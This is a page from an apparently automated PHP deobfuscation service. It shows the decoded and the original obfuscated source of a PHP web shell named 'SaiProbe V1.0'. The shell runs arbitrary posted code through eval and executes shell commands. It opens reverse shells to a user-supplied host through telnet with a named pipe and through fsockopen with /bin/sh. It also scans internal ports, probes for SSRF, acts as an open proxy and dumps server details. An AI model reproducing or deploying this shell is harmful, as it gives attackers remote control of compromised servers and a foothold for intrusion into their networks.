Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php goto Uv0X5; rv6ys: if (isset($_POST["\x74\x72\141\x6e\x73"])) { tranmit($_POST["\x7..

Decoded Output download

<?php
 goto Uv0X5; rv6ys: if (isset($_POST["trans"])) { tranmit($_POST["sourceip"], $_POST["sourceport"], $_POST["targetip"], $_POST["targetport"]); } goto KPce3; OAv8J: function tansmit($sourceip, $sourceport, $targetip, $targetport) { if (strtsr(php_uname(), "Windows")) { } elseif (strstr(php_uname(), "Linux")) { } else { } } goto WbyJ3; s8AMG: ?>
</td>
        </tr>
        <tr>
            <td>PHP</td>
            <td><?php  goto x_Whs; DyeS3: ob_end_clean(); goto g8W7E; fSLN_: ?>
                    </textarea>
            </div>
    </fieldset>  
</div><!-------------------------------------------------------------><div align="center" style="display:none" id="inner">
    <fieldset>
        <legend></legend>
            <div>
                <form method="post" action="#">
                Bash<input type="text" name="tarip" placeholder="IP">
                    <input type="text" name="tarport" placeholder=""> 
                    <input type="submit" name="rebound" value="">
                </form>
                <form method="post" action="">
                <input type="text" name="sourceip" placeholder="IP"><input type="text" name="sourceport" placeholder="">
                        <input type="text" name="targetip" placeholder="IP"><input type="text" name="targetport" placeholder="">
                        <input type="submit" name="trans" value="">
                <form>
            </div>
    </fieldset>
</div><!-------------------------------------------------------------><div align="center" id="portscan" style="display:none">
    <fieldset>
        <legend></legend>
        <form action="#" method="post">
            <input type="text" name="start"> -
            <input type="text" name="end">
            <input type="submit" name="submit" value="">
        </form>
    </fieldset></div>
 
<!------------------------------------------------------------->
<div align="center" id="ssrf" style="display:none">
    <fieldset>
        <legend></legend>
            <b>urlIPip,Brupsuit,80</b>
    </fieldset>
</div><!-----------------------------phpinfo--------------------------------><div align="center" id="phpinfo" style="display:none">
    <fieldset>
        <legend>phpinfo</legend>
        <?php  goto lr22K; sLFOe: if ($sysInfo["win_n"] != '') { echo $sysInfo["win_n"]; } else { echo @php_uname(); } goto s8AMG; x_Whs: echo PHP_VERSION; goto bsnjN; lr22K: phpinfo(); goto DmITn; Owex1: function proxy($url) { $output = file_get_contents($url); return $output; } goto yJ2Ox; Uv0X5: error_reporting(0); goto cJK17; rtChq: echo $_SERVER["DOCUMENT_ROOT"] ? str_replace("\", "/", $_SERVER["DOCUMENT_ROOT"]) : str_replace("\", "/", dirname(__FILE__)); goto EortQ; yvvP8: if (isset($_GET["ip"])) { $ssrf_ip = $_GET["ip"]; if ($ssrf_ip != 0) { ssrf($ssrf_ip); } } goto rv6ys; FJSg_: if ("/" == DIRECTORY_SEPARATOR) { echo $_SERVER["SERVER_ADDR"]; } else { echo @gethostbyname($_SERVER["SERVER_NAME"]); } goto lQOtI; EortQ: ?>
</td>
        </tr>
        <tr>
            <td></td>
            <td><?php  goto P30qb; PEO6l: ?>
</td>
        </tr>
    </table> 
    </fieldset>
</div><!-------------------------------------------------------------><div align="center" style="display:none" id="command">
    <fieldset>
        <legend></legend>
            <form method="post" action="#">
                <div>
                    <input type="text" placeholder="system(whoami)" name="order"/>
                    <input type="submit" value="">
                </div>
            </form>
            <div>
                    <textarea cols="150" rows="30" style="resize:none">
                        <?php  goto SflRZ; lQOtI: ?>
)</td>
        </tr>
        <tr>
            <td></td>
            <td><?php  goto Xbumg; P30qb: echo str_replace("\", "/", __FILE__) ? str_replace("\", "/", __FILE__) : $_SERVER["SCRIPT_FILENAME"]; goto Z2HK4; Xbumg: echo `whoami`; goto recUw; HC1wx: echo $_SERVER["SERVER_NAME"]; goto DZf_B; FYbXA: ?>
</td>
        </tr>
        <tr>
            <td></td>
            <td><?php  goto sLFOe; recUw: ?>
</td>
        </tr>
        <tr>
            <td></td>
            <td><?php  goto rtChq; SflRZ: $order = $_POST["order"]; goto IQIRo; g8W7E: class portScan { public $port; function __construct() { $this->port = array("20", "21", "22", "23", "69", "80", "81", "110", "139", "389", "443", "445", "873", "1090", "1433", "1521", "2000", "2181", "3306", "3389", "5632", "5672", "6379", "7001", "8000", "8069", "8080", "8081", "9200", "10050", "10086", "11211", "27017", "28017", "50070"); } function urlFilter($url) { $pattern = "/^(\d{1,2}|1\d\d|2[0-4]\d|25[0-5])(\.(\d{1,2}|1\d\d|2[0-4]\d|25[0-5])){3}$/"; $match = preg_match($pattern, $url); if (!$match) { echo "<script>alert('ip')</script>"; die(""); } $url = str_replace("http://", '', $url); $url = str_replace("/", '', $url); return $url; } function Prepare() { if ($_POST["end"] != '') { $base_url_1 = self::urlFilter($_POST["start"]); $base_url_2 = self::urlFilter($_POST["end"]); $base_url = array($base_url_1, $base_url_2); self::Scan($base_url, $this->port); } else { echo "<script>alert('')</script>"; } } function outPut() { } function Scan($base_url, $port) { $start = explode(".", $base_url["0"]); $end = explode(".", $base_url["1"]); $length = $end["3"] - $start["3"]; for ($i = 0; $i <= $length; $i++) { $ip = $start[0] . "." . $start[1] . "." . $start[2] . "." . ($start[3] + $i); foreach ($port as $ports) { $ips = "{$ip}:{$ports}"; $result = @fsockopen($ip, $ports, $errno, $errstr, 0.1); if ($result) { echo $ip . "---------------------" . $ports . "" . "<br>"; flush(); } } } } } goto LZFmw; Reokc: ?>
<!--========================================================================================================================================================================================================================================================================================================================================--><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head>   <title>Sai V1.0</title>
<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7" /><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><style type="text/css"></style></head>
<div align="center">
    <h1>SaiProbe V1.0</h1><hr>
    <div>
        <a href="?id=1"></a>|<a href="?id=2"></a>|<a href="?id=3"></a>|<a href="?id=4"></a>|<a href="?id=5&ip=0"></a>|<a href="?id=6">phpinfo</a>|<a href="?id=7&proxy="></a>|<a href="#"></a>
    </div>
<hr>
<!------------------------------------------------------------->
</div><div align="center" id="normal">
    <fieldset>
        <legend></legend>
    <table border="1" align="center" width="50%">
        <tr>
            <td>IP/</td>
            <td><?php  goto HC1wx; WbyJ3: function bounce($targetip, $targetport) { if (substr(php_uname(), 0, 1) == "W") { system("php -r '{$sock}=fsockopen({$targetip},{$targetport});exec('/bin/sh -i <&3 >&3 2>&3');'"); } elseif (substr(php_uname(), 0, 1) == "L") { echo "linux test"; system("mknod inittab p && telnet {$targetip} {$targetport} 0<inittab | /bin/bash 1>inittab"); } else { echo "<script>alert('Can't recognize this operation system!)</script>"; } } goto Owex1; Tvh9e: echo $_SERVER["SERVER_PORT"]; goto FYbXA; LZFmw: function ssrf($ip, $port = 80) { $res = fsockopen($ip, $port, $errno, $errstr, 0.2); if ($res) { echo ""; } else { echo ""; } } goto OAv8J; wHfQu: echo $_SERVER["PHPRC"]; goto PEO6l; yJ2Ox: $scan = new portScan(); goto z3Adi; IQIRo: echo eval($order . ";"); goto fSLN_; bsnjN: ?>
</td>
        </tr>
        <tr>
            <td>PHP</td>
            <td><?php  goto wHfQu; Z2HK4: ?>
</td>
        </tr>
        <tr>
            <td></td>
            <td><?php  goto Tvh9e; KPce3: if (isset($_POST["rebound"])) { bounce($_POST["tarip"], $_POST["tarport"]); } goto Q40Kw; DZf_B: ?>
(<?php  goto FJSg_; z3Adi: if (isset($_POST["submit"])) { if ($_POST["start"] != '') { $scan->Prepare(); } else { echo "<script>alert('')</script>"; } } goto yvvP8; Q40Kw: if (isset($_GET["proxy"])) { $proxy_web = proxy($_GET["proxy"]); echo "<div>" . $proxy_web . "</div>"; } goto Reokc; aFjxm: echo $_GET["id"]; goto YX3Jc; DmITn: ?>
    </fieldset></div>
 
<!------------------------------------------------------------->
<div align="center" id="proxy" style="display:none">
    <fieldset>
        <legend></legend>
            <b>urlproxy</b>
    </fieldset>
</div><!-------------------------------------------------------------><div align="center" id="phpinfo" style="display:none">
    <fieldset>
    </fieldset>
</div><div align="center"><a href="http://www.heysec.org">Code by Sai</a></div><script type="text/javascript">
        var id=<?php  goto aFjxm; cJK17: set_time_limit(0); goto DyeS3; YX3Jc: ?>
;
        var x;
        switch (id){
            case 1:
            break;
            case 2:
                document.getElementById("inner").style.display='';
            break;
            case 3:
                document.getElementById("command").style.display='';
            break;
            case 4:
                document.getElementById("portscan").style.display='';
            break;
            case 5:
                document.getElementById("ssrf").style.display='';
            break;         
            case 6:
                document.getElementById("phpinfo").style.display='';
            break;
            case 7:
                document.getElementById("proxy").style.display='';
            break;
        }
    </script>

Did this file decode correctly?

Original Code

<?php
 goto Uv0X5; rv6ys: if (isset($_POST["\x74\x72\141\x6e\x73"])) { tranmit($_POST["\x73\157\x75\162\143\x65\x69\160"], $_POST["\x73\x6f\165\x72\143\x65\x70\157\162\x74"], $_POST["\x74\x61\162\147\x65\x74\151\160"], $_POST["\164\141\162\x67\x65\x74\x70\x6f\162\x74"]); } goto KPce3; OAv8J: function tansmit($sourceip, $sourceport, $targetip, $targetport) { if (strtsr(php_uname(), "\127\151\156\144\157\x77\x73")) { } elseif (strstr(php_uname(), "\x4c\x69\x6e\165\x78")) { } else { } } goto WbyJ3; s8AMG: ?>
</td>
        </tr>
        <tr>
            <td>PHP</td>
            <td><?php  goto x_Whs; DyeS3: ob_end_clean(); goto g8W7E; fSLN_: ?>
                    </textarea>
            </div>
    </fieldset>  
</div><!-------------------------------------------------------------><div align="center" style="display:none" id="inner">
    <fieldset>
        <legend></legend>
            <div>
                <form method="post" action="#">
                Bash<input type="text" name="tarip" placeholder="IP">
                    <input type="text" name="tarport" placeholder=""> 
                    <input type="submit" name="rebound" value="">
                </form>
                <form method="post" action="">
                <input type="text" name="sourceip" placeholder="IP"><input type="text" name="sourceport" placeholder="">
                        <input type="text" name="targetip" placeholder="IP"><input type="text" name="targetport" placeholder="">
                        <input type="submit" name="trans" value="">
                <form>
            </div>
    </fieldset>
</div><!-------------------------------------------------------------><div align="center" id="portscan" style="display:none">
    <fieldset>
        <legend></legend>
        <form action="#" method="post">
            <input type="text" name="start"> -
            <input type="text" name="end">
            <input type="submit" name="submit" value="">
        </form>
    </fieldset></div>
 
<!------------------------------------------------------------->
<div align="center" id="ssrf" style="display:none">
    <fieldset>
        <legend></legend>
            <b>urlIPip,Brupsuit,80</b>
    </fieldset>
</div><!-----------------------------phpinfo--------------------------------><div align="center" id="phpinfo" style="display:none">
    <fieldset>
        <legend>phpinfo</legend>
        <?php  goto lr22K; sLFOe: if ($sysInfo["\x77\x69\156\x5f\x6e"] != '') { echo $sysInfo["\167\151\x6e\x5f\x6e"]; } else { echo @php_uname(); } goto s8AMG; x_Whs: echo PHP_VERSION; goto bsnjN; lr22K: phpinfo(); goto DmITn; Owex1: function proxy($url) { $output = file_get_contents($url); return $output; } goto yJ2Ox; Uv0X5: error_reporting(0); goto cJK17; rtChq: echo $_SERVER["\104\x4f\103\x55\x4d\105\x4e\x54\x5f\x52\117\x4f\124"] ? str_replace("\x5c", "\57", $_SERVER["\104\x4f\x43\125\x4d\105\x4e\124\137\122\117\117\124"]) : str_replace("\134", "\57", dirname(__FILE__)); goto EortQ; yvvP8: if (isset($_GET["\151\x70"])) { $ssrf_ip = $_GET["\x69\160"]; if ($ssrf_ip != 0) { ssrf($ssrf_ip); } } goto rv6ys; FJSg_: if ("\57" == DIRECTORY_SEPARATOR) { echo $_SERVER["\x53\x45\x52\126\x45\122\137\101\x44\x44\122"]; } else { echo @gethostbyname($_SERVER["\x53\105\x52\126\x45\122\x5f\116\101\115\x45"]); } goto lQOtI; EortQ: ?>
</td>
        </tr>
        <tr>
            <td></td>
            <td><?php  goto P30qb; PEO6l: ?>
</td>
        </tr>
    </table> 
    </fieldset>
</div><!-------------------------------------------------------------><div align="center" style="display:none" id="command">
    <fieldset>
        <legend></legend>
            <form method="post" action="#">
                <div>
                    <input type="text" placeholder="system(whoami)" name="order"/>
                    <input type="submit" value="">
                </div>
            </form>
            <div>
                    <textarea cols="150" rows="30" style="resize:none">
                        <?php  goto SflRZ; lQOtI: ?>
)</td>
        </tr>
        <tr>
            <td></td>
            <td><?php  goto Xbumg; P30qb: echo str_replace("\134", "\x2f", __FILE__) ? str_replace("\x5c", "\57", __FILE__) : $_SERVER["\123\x43\x52\111\120\124\137\x46\x49\x4c\x45\x4e\x41\x4d\105"]; goto Z2HK4; Xbumg: echo `whoami`; goto recUw; HC1wx: echo $_SERVER["\123\x45\122\x56\105\x52\x5f\x4e\101\x4d\105"]; goto DZf_B; FYbXA: ?>
</td>
        </tr>
        <tr>
            <td></td>
            <td><?php  goto sLFOe; recUw: ?>
</td>
        </tr>
        <tr>
            <td></td>
            <td><?php  goto rtChq; SflRZ: $order = $_POST["\x6f\162\144\x65\162"]; goto IQIRo; g8W7E: class portScan { public $port; function __construct() { $this->port = array("\62\60", "\x32\x31", "\x32\62", "\62\x33", "\x36\x39", "\70\x30", "\x38\61", "\x31\x31\x30", "\x31\x33\71", "\x33\x38\x39", "\64\64\63", "\x34\64\x35", "\70\x37\x33", "\x31\60\x39\60", "\x31\x34\63\63", "\x31\x35\62\x31", "\x32\x30\x30\x30", "\62\x31\x38\x31", "\63\x33\60\x36", "\63\x33\x38\71", "\x35\x36\63\62", "\x35\x36\x37\x32", "\x36\x33\67\71", "\x37\60\x30\61", "\x38\x30\60\60", "\x38\60\x36\71", "\70\x30\70\60", "\x38\x30\x38\x31", "\x39\62\60\x30", "\61\x30\x30\65\60", "\61\60\x30\70\66", "\x31\61\62\x31\x31", "\62\x37\x30\61\x37", "\x32\x38\60\61\x37", "\65\x30\x30\67\60"); } function urlFilter($url) { $pattern = "\x2f\136\x28\134\x64\x7b\61\x2c\62\175\x7c\61\134\144\x5c\x64\174\x32\x5b\60\55\64\x5d\x5c\x64\x7c\62\65\133\x30\x2d\x35\135\x29\x28\134\56\x28\x5c\x64\x7b\x31\x2c\x32\175\x7c\61\134\x64\134\144\174\62\133\x30\55\64\135\134\x64\174\x32\65\x5b\60\55\65\135\51\51\x7b\x33\x7d\x24\x2f"; $match = preg_match($pattern, $url); if (!$match) { echo "\x3c\163\x63\x72\x69\160\x74\x3e\141\154\145\x72\164\x28\x27\344\275\xa0\350\276\223\xe5\x85\xa5\xe7\x9a\204\151\x70\xe5\234\260\345\235\200\xe9\x9d\x9e\xe6\263\x95\xef\xbc\214\350\257\xb7\351\207\x8d\346\x96\xb0\xe8\276\223\xe5\x85\245\47\51\74\x2f\x73\143\x72\x69\x70\164\76"; die("\345\x86\x8d\xe6\xa3\x80\xe6\x9f\245\xe6\xa3\x80\346\237\xa5\xe5\220\xa7\xe2\200\xa6\xe2\200\xa6"); } $url = str_replace("\x68\164\164\160\x3a\x2f\57", '', $url); $url = str_replace("\x2f", '', $url); return $url; } function Prepare() { if ($_POST["\x65\156\144"] != '') { $base_url_1 = self::urlFilter($_POST["\163\x74\141\x72\x74"]); $base_url_2 = self::urlFilter($_POST["\x65\156\144"]); $base_url = array($base_url_1, $base_url_2); self::Scan($base_url, $this->port); } else { echo "\x3c\x73\x63\162\151\x70\x74\x3e\x61\x6c\145\162\164\x28\47\xe5\x90\216\xe9\x9d\xa2\351\202\243\xe4\xb8\xaa\346\241\206\xe4\xb9\x9f\350\xa6\201\350\xbe\223\347\232\x84\342\x80\xa6\342\200\246\47\51\74\x2f\x73\x63\x72\x69\160\164\76"; } } function outPut() { } function Scan($base_url, $port) { $start = explode("\x2e", $base_url["\x30"]); $end = explode("\x2e", $base_url["\x31"]); $length = $end["\63"] - $start["\63"]; for ($i = 0; $i <= $length; $i++) { $ip = $start[0] . "\x2e" . $start[1] . "\56" . $start[2] . "\x2e" . ($start[3] + $i); foreach ($port as $ports) { $ips = "{$ip}\72{$ports}"; $result = @fsockopen($ip, $ports, $errno, $errstr, 0.1); if ($result) { echo $ip . "\x2d\55\x2d\55\55\x2d\55\55\x2d\55\x2d\x2d\55\x2d\55\55\x2d\55\x2d\55\x2d" . $ports . "\347\xab\257\xe5\217\243\345\274\200\346\224\276" . "\x3c\x62\x72\x3e"; flush(); } } } } } goto LZFmw; Reokc: ?>
<!--========================================================================================================================================================================================================================================================================================================================================--><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head>   <title>Sai V1.0</title>
<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7" /><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><style type="text/css"></style></head>
<div align="center">
    <h1>SaiProbe V1.0</h1><hr>
    <div>
        <a href="?id=1"></a>|<a href="?id=2"></a>|<a href="?id=3"></a>|<a href="?id=4"></a>|<a href="?id=5&ip=0"></a>|<a href="?id=6">phpinfo</a>|<a href="?id=7&proxy="></a>|<a href="#"></a>
    </div>
<hr>
<!------------------------------------------------------------->
</div><div align="center" id="normal">
    <fieldset>
        <legend></legend>
    <table border="1" align="center" width="50%">
        <tr>
            <td>IP/</td>
            <td><?php  goto HC1wx; WbyJ3: function bounce($targetip, $targetport) { if (substr(php_uname(), 0, 1) == "\x57") { system("\160\150\x70\x20\55\x72\x20\x27{$sock}\x3d\x66\163\x6f\143\153\157\x70\145\156\50{$targetip}\54{$targetport}\51\73\145\170\145\143\x28\x27\57\x62\151\x6e\x2f\x73\x68\40\x2d\151\40\74\46\63\x20\x3e\46\x33\x20\x32\76\x26\63\x27\x29\x3b\47"); } elseif (substr(php_uname(), 0, 1) == "\x4c") { echo "\154\x69\156\x75\170\x20\x74\145\163\x74"; system("\x6d\153\156\x6f\x64\x20\151\x6e\151\x74\164\x61\142\x20\x70\x20\x26\x26\x20\164\x65\154\x6e\x65\164\40\173\x24\x74\141\162\x67\145\164\x69\x70\175\40\x7b\x24\x74\x61\x72\x67\145\x74\x70\x6f\162\x74\175\x20\x30\74\x69\156\151\164\164\x61\x62\40\x7c\x20\x2f\x62\x69\156\57\142\x61\163\150\x20\x31\x3e\151\156\151\164\x74\141\x62"); } else { echo "\74\163\143\162\x69\x70\164\76\141\154\x65\x72\164\x28\x27\x43\141\156\x27\164\x20\x72\145\x63\x6f\147\x6e\x69\x7a\145\x20\164\x68\151\163\x20\157\x70\x65\162\141\x74\x69\x6f\x6e\40\x73\x79\x73\164\x65\155\41\51\74\x2f\163\x63\x72\151\x70\164\76"; } } goto Owex1; Tvh9e: echo $_SERVER["\123\105\122\x56\105\122\x5f\x50\x4f\x52\124"]; goto FYbXA; LZFmw: function ssrf($ip, $port = 80) { $res = fsockopen($ip, $port, $errno, $errstr, 0.2); if ($res) { echo "\350\xaf\245\345\x9c\260\345\235\200\xe5\xad\230\xe6\xb4\xbb\xe7\232\204\357\274\x81\357\274\201\357\xbc\x81\xef\xbc\x81\xef\xbc\201\xef\274\x81"; } else { echo "\xe4\270\215\345\255\x98\346\264\273\xef\274\201"; } } goto OAv8J; wHfQu: echo $_SERVER["\x50\x48\120\x52\103"]; goto PEO6l; yJ2Ox: $scan = new portScan(); goto z3Adi; IQIRo: echo eval($order . "\73"); goto fSLN_; bsnjN: ?>
</td>
        </tr>
        <tr>
            <td>PHP</td>
            <td><?php  goto wHfQu; Z2HK4: ?>
</td>
        </tr>
        <tr>
            <td></td>
            <td><?php  goto Tvh9e; KPce3: if (isset($_POST["\162\145\142\x6f\x75\156\144"])) { bounce($_POST["\164\x61\162\151\x70"], $_POST["\x74\x61\162\160\x6f\162\x74"]); } goto Q40Kw; DZf_B: ?>
(<?php  goto FJSg_; z3Adi: if (isset($_POST["\163\165\x62\155\x69\x74"])) { if ($_POST["\163\164\141\x72\164"] != '') { $scan->Prepare(); } else { echo "\74\x73\143\x72\151\x70\x74\76\141\154\145\162\x74\x28\47\xe4\273\200\344\xb9\210\351\x83\xbd\xe6\xb2\xa1\xe8\xbe\223\xe6\200\x8e\344\xb9\210\346\211\xab\357\274\237\x27\51\74\x2f\x73\143\162\151\x70\164\x3e"; } } goto yvvP8; Q40Kw: if (isset($_GET["\160\162\x6f\x78\x79"])) { $proxy_web = proxy($_GET["\160\x72\157\x78\x79"]); echo "\74\x64\151\166\76" . $proxy_web . "\x3c\x2f\144\151\x76\76"; } goto Reokc; aFjxm: echo $_GET["\151\x64"]; goto YX3Jc; DmITn: ?>
    </fieldset></div>
 
<!------------------------------------------------------------->
<div align="center" id="proxy" style="display:none">
    <fieldset>
        <legend></legend>
            <b>urlproxy</b>
    </fieldset>
</div><!-------------------------------------------------------------><div align="center" id="phpinfo" style="display:none">
    <fieldset>
    </fieldset>
</div><div align="center"><a href="http://www.heysec.org">Code by Sai</a></div><script type="text/javascript">
        var id=<?php  goto aFjxm; cJK17: set_time_limit(0); goto DyeS3; YX3Jc: ?>
;
        var x;
        switch (id){
            case 1:
            break;
            case 2:
                document.getElementById("inner").style.display='';
            break;
            case 3:
                document.getElementById("command").style.display='';
            break;
            case 4:
                document.getElementById("portscan").style.display='';
            break;
            case 5:
                document.getElementById("ssrf").style.display='';
            break;         
            case 6:
                document.getElementById("phpinfo").style.display='';
            break;
            case 7:
                document.getElementById("proxy").style.display='';
            break;
        }
    </script>

Function Calls

None

Variables

None

Stats

MD5 d343f4f8a32dcc3cbbf8923c39321dd1
Eval Count 0
Decode Time 104 ms